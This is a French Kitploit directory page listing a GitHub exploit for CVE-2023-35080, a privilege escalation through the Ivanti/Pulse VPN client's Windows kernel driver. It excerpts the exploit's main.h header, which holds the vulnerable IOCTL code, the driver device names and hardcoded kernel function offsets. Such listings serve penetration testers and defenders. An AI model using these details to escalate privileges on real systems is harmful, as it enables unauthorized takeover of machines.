Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Ivanti-Pulse_VPN-Client_Exploit-CVE-2023-35080_Privilege-escalation — Exploit pour CVE-2023-35080 exploitant une primitive d'écriture dans le pilote du noyau du client VPN Ivanti/Pulse sous Windows pour réaliser une élévation de privilèges. | Kitploit
Outils/GitHubGitHub/hophouse/ivanti-pulse_vpn-client_exploit-cve-2023-35080_privilege-escalation
Escalade de PrivilègesFrameworks d'ExploitationAnalyse des VulnérabilitésExploitationExploitation de Binaires
GitHubhophouse/ivanti-pulse_vpn-client_exploit-cve-2023-35080_privilege-escalation

Ivanti-Pulse_VPN-Client_Exploit-CVE-2023-35080_Privilege-escalation

Exploit pour CVE-2023-35080 exploitant une primitive d'écriture dans le pilote du noyau du client VPN Ivanti/Pulse sous Windows pour réaliser une élévation de privilèges.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
1il y a 2 ansPas encore vérifié

Exploitation du client VPN Ivanti/Pulse de la CVE-2023-35080 menant à une élévation de privilèges

Code lié à l'exploitation de la CVE-2023-35080 qui tire parti d'une primitive d'écriture dans le pilote noyau du client VPN Ivanti/Pulse sous Windows. Cette primitive d'écriture conduit à une élévation de privilèges.

L'exploit a été construit à l'aide des détails techniques partagés dans l'article suivant : https://northwave-cybersecurity.com/ivanti-pulse-vpn-privilege-escalation.

Certains détails sont codés en dur dans le fichier main.h :

root@kitploit:~
#pragma once

#include <Windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <winternl.h>


#define VULN_IOCTL  0x80002018

////////

/*
 * jnprTdi_9115_15819 W10
 */

 // #define DEVICE_NAME_W L"jnprTdi_9115_15819"

 // // KxWaitForSpinLockAndAcquire
 // #define SPIN_OFFSET 0x300ea0

 // // KxTryToAcquireSpinLock
 // #define TRY_SPIN_OFFSET 0x361758

 // // void write_char(byte param_1,byte **param_2,int *param_3)
 // #define WRITE_CHAR_OFFSET 0x3d5878

 ////////

 /*
  * jnprTdi_9117_18209 W11
  */

#define DEVICE_NAME_W L"jnprTdi_9117_18209"

  // KxWaitForSpinLockAndAcquire 
#define SPIN_OFFSET 0x300e9e

// KxTryToAcquireSpinLock
#define TRY_SPIN_OFFSET 0x361757

// void write_char(byte param_1,byte **param_2,int *param_3)
#define WRITE_CHAR_OFFSET 0x3d93f8

////////

[...]
Télécharger l’outil